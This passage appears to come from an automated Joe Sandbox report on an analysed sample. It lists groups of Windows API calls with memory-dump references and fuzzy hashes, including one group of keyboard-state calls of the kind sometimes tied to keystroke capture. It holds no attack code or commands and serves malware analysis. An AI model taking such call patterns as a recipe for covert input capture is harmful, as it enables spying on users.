                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: ClientRect$ParentPointsScreenWindow
                                                                  • String ID:
                                                                  • API String ID: 1402249346-0
                                                                  • Opcode ID: 20ee193d50c0ee213fce0e83c2c3e00cd4c2f8b4d4b3228593ccddbb2a04e21a
                                                                  • Instruction ID: 36104e3326b6fbed9456be8ee0e873e7b39356ee75bbfb99798c922569d82406
                                                                  • Opcode Fuzzy Hash: 20ee193d50c0ee213fce0e83c2c3e00cd4c2f8b4d4b3228593ccddbb2a04e21a
                                                                  • Instruction Fuzzy Hash: 7F317272610209AFCB01DFA5DC889BEBBB9FF48341B210515F946E7160DB70DE14DB54
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: _free$AtomDeleteGlobal$H_prolog3_catch_
                                                                  • String ID:
                                                                  • API String ID: 1844215989-0
                                                                  • Opcode ID: 9b471ac83a3fe352a2085a6bfbb4d2c65c1a24087c23f95275290b0b9d966c03
                                                                  • Instruction ID: 56afab8347e427f920fce6999cdd51b5811919e2efea45b0a27e125fb172716f
                                                                  • Opcode Fuzzy Hash: 9b471ac83a3fe352a2085a6bfbb4d2c65c1a24087c23f95275290b0b9d966c03
                                                                  • Instruction Fuzzy Hash: 3A3180706002409FCB24AF64C9D9FADBBE6BF14700F54886DF14A8B662CB71DD80CB15
                                                                  APIs
                                                                  • GetAsyncKeyState.USER32(00000012), ref: 001F76B8
                                                                  • GetAsyncKeyState.USER32(00000012), ref: 001F76D2
                                                                  • _memset.LIBCMT ref: 001F76F1
                                                                  • GetKeyboardState.USER32(?), ref: 001F7700
                                                                  • GetKeyboardLayout.USER32(?), ref: 001F7717
                                                                  • MapVirtualKeyW.USER32(?,00000000), ref: 001F7733
                                                                  • ToUnicodeEx.USER32(?,00000000), ref: 001F773B
                                                                  • CharUpperW.USER32(?), ref: 001F7748
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: State$AsyncKeyboard$CharLayoutUnicodeUpperVirtual_memset
                                                                  • String ID:
                                                                  • API String ID: 3224171628-0
                                                                  • Opcode ID: 64f853e5cdbd48df68d9df54b1c2b40db4d5987dc709f241c0db509be15127ff
                                                                  • Instruction ID: 6c5eda7c54b54bda36db4d94695a59bca7cccf7fd6c7c4b03fd2d7d26779f04d
                                                                  • Opcode Fuzzy Hash: 64f853e5cdbd48df68d9df54b1c2b40db4d5987dc709f241c0db509be15127ff
                                                                  • Instruction Fuzzy Hash: CE21A17591420CABDB10AB64ECC9FFD776CAB54750F80006AFA85D60C0EF7099848F64
                                                                  APIs
                                                                  • GetMenuItemCount.USER32(?), ref: 001CA392
                                                                  • GetMenuItemCount.USER32(?), ref: 001CA39A
                                                                  • GetSubMenu.USER32(?,-00000001), ref: 001CA3B7
                                                                  • GetMenuItemCount.USER32(00000000), ref: 001CA3C7
                                                                  • GetSubMenu.USER32(00000000,00000000), ref: 001CA3D8
                                                                  • RemoveMenu.USER32(00000000,00000000,00000400), ref: 001CA3F5
                                                                  • GetSubMenu.USER32(?,?), ref: 001CA40F
                                                                  • RemoveMenu.USER32(?,?,00000400), ref: 001CA42D
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$CountItem$Remove
                                                                  • String ID:
                                                                  • API String ID: 3494307843-0
                                                                  • Opcode ID: 558a701184b5df8f3121f9cd5c3d1dff380e1235cf407ae3c30229a9694e67b0
                                                                  • Instruction ID: 467e61255e5d0022d24187a13075d8f6b7d4708e658a6aabcc2a7f2f74838c02
                                                                  • Opcode Fuzzy Hash: 558a701184b5df8f3121f9cd5c3d1dff380e1235cf407ae3c30229a9694e67b0
                                                                  • Instruction Fuzzy Hash: DB216A3190020CFBCF029FA4DD88E9DBBB6FF24308FA4845AE501A6110C7B1EA51EF81
                                                                  APIs
                                                                  • GlobalLock.KERNEL32(?), ref: 001C93FB
                                                                  • lstrcmpW.KERNEL32(00000000,?), ref: 001C9408
                                                                  • OpenPrinterW.WINSPOOL.DRV(?,?,00000000), ref: 001C941A
                                                                  • DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 001C943A
                                                                  • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 001C9442
                                                                  • GlobalLock.KERNEL32(00000000), ref: 001C944C
                                                                  • DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 001C9459
                                                                  • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 001C9471
                                                                    • Part of subcall function 001D0E5F: GlobalFlags.KERNEL32(?), ref: 001D0E6E
                                                                    • Part of subcall function 001D0E5F: GlobalUnlock.KERNEL32(?), ref: 001D0E7F
                                                                    • Part of subcall function 001D0E5F: GlobalFree.KERNEL32(?), ref: 001D0E89
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                  • String ID:
                                                                  • API String ID: 168474834-0
                                                                  • Opcode ID: 29ec6e43d9ff100f81b7f362ae5cca307484410f7ea7ef90d1741b654a4ba80b
                                                                  • Instruction ID: 8d0761ca89a36f5969a95489cf265b155f6d276fb654be1f91b9800cefc43431
                                                                  • Opcode Fuzzy Hash: 29ec6e43d9ff100f81b7f362ae5cca307484410f7ea7ef90d1741b654a4ba80b
                                                                  • Instruction Fuzzy Hash: 3C119171500604BADB226FA6CD89D6F7BFDEB84B40B00441EF645D6121DB31DD11DB60
                                                                  APIs
                                                                  • GetSystemMetrics.USER32(00000031), ref: 001CCD7E
                                                                  • GetSystemMetrics.USER32(00000032), ref: 001CCD88
                                                                  • SetRectEmpty.USER32(003331EC), ref: 001CCD97
                                                                  • EnumDisplayMonitors.USER32(00000000,00000000,Function_0000CCE3,003331EC,?,?,0021D83D,?,?,?,001E72AE,?,?), ref: 001CCDA7
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,003331EC,00000000), ref: 001CCDC2
                                                                  • SystemParametersInfoW.USER32(00001002,00000000,00333218,00000000), ref: 001CCDE2
                                                                  • SystemParametersInfoW.USER32(00001012,00000000,0033321C,00000000), ref: 001CCDFA
                                                                  • SystemParametersInfoW.USER32 ref: 001CCE1A
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: System$InfoParameters$Metrics$DisplayEmptyEnumMonitorsRect
                                                                  • String ID:
                                                                  • API String ID: 2614369430-0
                                                                  • Opcode ID: 685f2d9d31c1d439b72b1494900ef480a4822cec275dc7c50f16fe5332bbe2c8
                                                                  • Instruction ID: 5f3ff894ef2f157ceb2fc910e5e3444ac57cc0320746cb94f4e2e487d8745904
                                                                  • Opcode Fuzzy Hash: 685f2d9d31c1d439b72b1494900ef480a4822cec275dc7c50f16fe5332bbe2c8
                                                                  • Instruction Fuzzy Hash: E811C971541744AFE2319B669C89EE7BAFCEBDAB40F00091EE5AE86140D7B1A841CA61
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Global$Size$LockUnlock$Alloc
                                                                  • String ID:
                                                                  • API String ID: 2344174106-0
                                                                  • Opcode ID: 0818fb64ffe2b08cd042d7e7c71f291aac6dca5f32f786664041ed1023a6a91d
                                                                  • Instruction ID: 282fbfd674c75841e4f44bd00c00562acd6c1141be089495814a612d97fca573
                                                                  • Opcode Fuzzy Hash: 0818fb64ffe2b08cd042d7e7c71f291aac6dca5f32f786664041ed1023a6a91d
                                                                  • Instruction Fuzzy Hash: C301717190021CBFDB126F65DC88D5E7F6CEF542A47108069FD0997211DA70DE10DAA1
                                                                  APIs
                                                                  • GetSystemMetrics.USER32(0000000B), ref: 001D520C
                                                                  • GetSystemMetrics.USER32(0000000C), ref: 001D5213
                                                                  • GetSystemMetrics.USER32(00000002), ref: 001D521A
                                                                  • GetSystemMetrics.USER32(00000003), ref: 001D5224
                                                                  • GetDC.USER32(00000000), ref: 001D522E
                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 001D523F
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001D5247
                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 001D524F
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: MetricsSystem$CapsDevice$Release
                                                                  • String ID:
                                                                  • API String ID: 1151147025-0
                                                                  • Opcode ID: c19f5d9740f3657cd9d28a6fb2842db3f997f6fe0418e573e41ecb85e3562d42
                                                                  • Instruction ID: 18e017d6ed2bef8a837a53e9e3c08bbde6ec8c08801e2796c14be8d569f7fc9d
                                                                  • Opcode Fuzzy Hash: c19f5d9740f3657cd9d28a6fb2842db3f997f6fe0418e573e41ecb85e3562d42
                                                                  • Instruction Fuzzy Hash: 4EF01DB1E80754BAE7105B72AC8DB267F68FB45761F104416E6499F280DAB598118FD0
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 0024A829
                                                                  • GetMenuItemCount.USER32(0000000D), ref: 0024A872
                                                                  • GetMenuItemID.USER32(0000000D,?), ref: 0024A895
                                                                    • Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
                                                                    • Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22
                                                                    • Part of subcall function 0023ABE8: __EH_prolog3.LIBCMT ref: 0023ABEF
                                                                    • Part of subcall function 001CCC4D: __EH_prolog3.LIBCMT ref: 001CCC54
                                                                  • lstrlenW.KERNEL32(00000000,?), ref: 0024A9B7
                                                                  • CharUpperBuffW.USER32(00000002,00000001), ref: 0024A9CC
                                                                  • lstrlenW.KERNEL32(00000000), ref: 0024A9D4
                                                                  • GetSubMenu.USER32(00000000,?), ref: 0024AB06
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog3Menu$Itemlstrlen$BuffCharCountException@8H_prolog3_ThrowUpper
                                                                  • String ID:
                                                                  • API String ID: 1336055891-0
                                                                  • Opcode ID: f04245fa5ef5c0c15993c386c0262ff634ac0bb20d1a89deac96a90c28ced9c3
                                                                  • Instruction ID: 3216721072c7daaf58d880656e9d28aa462f169edabe5c167d6c93e184ce3dec
                                                                  • Opcode Fuzzy Hash: f04245fa5ef5c0c15993c386c0262ff634ac0bb20d1a89deac96a90c28ced9c3
                                                                  • Instruction Fuzzy Hash: B4D18870914229EBCB29EB64CC95BEDB774AF25314F1042DAE11AA72D1DF309E90CF52
                                                                  APIs
                                                                  • SetRectEmpty.USER32(002F73F0), ref: 001FEF14
                                                                  • GetKeyState.USER32(00000011), ref: 001FEF1C
                                                                  • IsRectEmpty.USER32(?), ref: 001FEF79
                                                                  • GetWindowRect.USER32(?,002F73F0), ref: 001FF0F6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Empty$StateWindow
                                                                  • String ID: D2$`2
                                                                  • API String ID: 2684165152-4068519015
                                                                  • Opcode ID: 4dc4dabd2ad7265e40da776f8ff70dca9c520a75608d850f0799872de411be66
                                                                  • Instruction ID: 40f2b88b527851a841212ff38cef6646f6400139376db689ee535c55ef707113
                                                                  • Opcode Fuzzy Hash: 4dc4dabd2ad7265e40da776f8ff70dca9c520a75608d850f0799872de411be66
                                                                  • Instruction Fuzzy Hash: 49913D31A042099FDF15DFA4D885BBEBBB6FF88310F148169FA05AB255DB709C41CBA0
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00250EE5
                                                                  • CreateCompatibleDC.GDI32(00000002), ref: 00250F42
                                                                    • Part of subcall function 00233605: FillRect.USER32(?,00000020), ref: 00233619
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: CompatibleCreateFillH_prolog3Rect
                                                                  • String ID:
                                                                  • API String ID: 2215992850-0
                                                                  • Opcode ID: 4d54b7d7281f46f460d9b00ce22413ee5e28fd383145dda8c98bbc766d4d54db
                                                                  • Instruction ID: 9cb77115acc2dfafdab20e97b4c67a79eaef266f0e5ab59333d81e16398e85d3
                                                                  • Opcode Fuzzy Hash: 4d54b7d7281f46f460d9b00ce22413ee5e28fd383145dda8c98bbc766d4d54db
                                                                  • Instruction Fuzzy Hash: F091CE30A2021ADFCB14DFA8CD85AEEBBB4FF44301F004269F955E6291DB70D969CB64
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: _fgetc$_memcpy_s
                                                                  • String ID: string too long
                                                                  • API String ID: 160369518-2556327735
                                                                  • Opcode ID: 0747a4f8c13984996dce05856d3dc4bf5914f89b69cbcc9bb9b1384ede410ef2
                                                                  • Instruction ID: c748f7077203540f6f65666a7bc7b3124cfe5a556de4cf6620949e7d8a791472
                                                                  • Opcode Fuzzy Hash: 0747a4f8c13984996dce05856d3dc4bf5914f89b69cbcc9bb9b1384ede410ef2
                                                                  • Instruction Fuzzy Hash: 63918E71E002199FCB18CBA8C881EEEB7B5FF28314F50861DE522A7681D771EA14CF90
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00215FF2
                                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00216039
                                                                  • GetWindow.USER32(00000000,00000005), ref: 00216060
                                                                  • GetWindow.USER32(?,00000002), ref: 0021608B
                                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 002160BA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSendWindow$H_prolog3
                                                                  • String ID: 83/
                                                                  • API String ID: 1382076901-2323854675
                                                                  • Opcode ID: 641a621be6a6623750593862099542a5eb1e9d7b4c5943c1e21a109cfc70abde
                                                                  • Instruction ID: 581643d6c80be3080a3ca21910ffe5b9dd36c0b03a0f830e76710aaf494915cc
                                                                  • Opcode Fuzzy Hash: 641a621be6a6623750593862099542a5eb1e9d7b4c5943c1e21a109cfc70abde
                                                                  • Instruction Fuzzy Hash: F571D335620215AFCB259F64C889FEDB7E5BF28750F254069F8099B392DB70DDA0CB90
                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 00217071
                                                                  • IsWindow.USER32(?), ref: 00217238
                                                                  • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 00217264
                                                                  • GetParent.USER32(?), ref: 0021726D
                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000185,00000000), ref: 00217283
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSendWindow$ParentRedraw
                                                                  • String ID: 83/
                                                                  • API String ID: 3493001960-2323854675
                                                                  • Opcode ID: e0447b1cf9424dbc6cbb99a89a849fb2a554b866ed2d933fae48149d6856171a
                                                                  • Instruction ID: 2c924e9ec28a9e570a3d768c2c8ffb80290026c1c855934406ecf248c0ca84a8
                                                                  • Opcode Fuzzy Hash: e0447b1cf9424dbc6cbb99a89a849fb2a554b866ed2d933fae48149d6856171a
                                                                  • Instruction Fuzzy Hash: E1718B34714202AFDB259F64C889AEEBBF5BF68300F144579F94ADB291DB309D91CB90
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 001E4222
                                                                    • Part of subcall function 00214CC5: __EH_prolog3.LIBCMT ref: 00214CCC
                                                                  • GetMenuItemCount.USER32(?), ref: 001E428C
                                                                  • GetMenuItemID.USER32(?,?), ref: 001E42AF
                                                                  • GetMenuItemCount.USER32(?), ref: 001E42F2
